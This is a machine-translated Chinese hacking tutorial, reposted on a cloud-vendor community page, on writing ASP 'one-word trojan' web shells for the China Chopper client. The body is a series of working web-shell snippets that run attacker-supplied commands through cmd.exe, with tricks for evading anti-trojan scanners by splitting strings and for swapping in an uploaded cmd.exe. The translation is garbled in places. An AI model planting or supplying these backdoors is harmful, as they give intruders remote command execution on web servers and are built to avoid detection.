Home > Developer > Web Develop

About ASP, php,jps a word trojan--Chinese kitchen knife use

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >


Tool: Http://pan.baidu.com/s/1o6jxAgq

first, to see Zzzeva free FSO cmd.asp
<input type=text name= "cmd" size=60>
<input Type=submit value= "Run" ></form>
<textarea readonly cols=80 ROWS=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
" & Request.Form ("cmd")). STDOUT.READALL%>
</textarea>
Does it feel a little long? Writing is a bit hard to write when hackers inject. Let's change it.
second, change the Zzzeva FSO-free cmd.asp

<textarea readonly cols=80 rows=20>
<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>

Usage is xx.asp?cmd=net user
This is to get the results are convenient, in fact, if not for the beautiful, but also shorter, then the third
A third, shortened cmd.asp.

<%response.write Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" cmd ")) .stdout.readall%>


The Response.Write is used here, and the variables are in CMD. Why not be shorter?
Fourth, a shorter cmd.asp.

<%=server.createobject ("Wscript.Shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>

It seems to be the shortest. Apart from being short, we have to work in other places.
Fifth, Wscript.Shell be renamed how to do?
Code:

<object Runat=server Id=kk Scope=page
Classid= "Clsid:72c24dd5-d70a-438b-8a42-98424b88afb8" ></ObjEct>
<%=kk.exec ("cmd/c" +request ("cmd")) .stdout.readall%>

Of course, the ClassID value differs in different systems. This has to be changed by itself

Sixth, by some kill ASP Trojan software detection out how to do?
Take the variables apart. Code:


<%=server.createobject ("ws" + "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>

Or

<%=server.createobject ("ws" & "Cript.shell"). EXEC ("cmd.exe/c
"&request (" C ")) .stdout.readall%>

Here the code in the quotation marks can be arbitrarily dismantled, like can also be broken into


<%=server.createobject ("ws" & "Cript.shell"). EXEC ("C" & "md.exe/c
"&request (" C ")) .stdout.readall%>


7th one, Cmd.exe do not let the call do?
You upload a cmd.exe yourself, put it in a directory that can be called, and the code changes as follows:

<%=server.createobject ("Wscript.Shell"). EXEC ("e:\aspx\cmd.exe/c
"&request (" C ")) .stdout.readall%>


About ASP, php,jps a word trojan--Chinese kitchen knife use

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
about php chinese character word count free chinese word processor chinese word count word count chinese characters definition for word use php is a

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More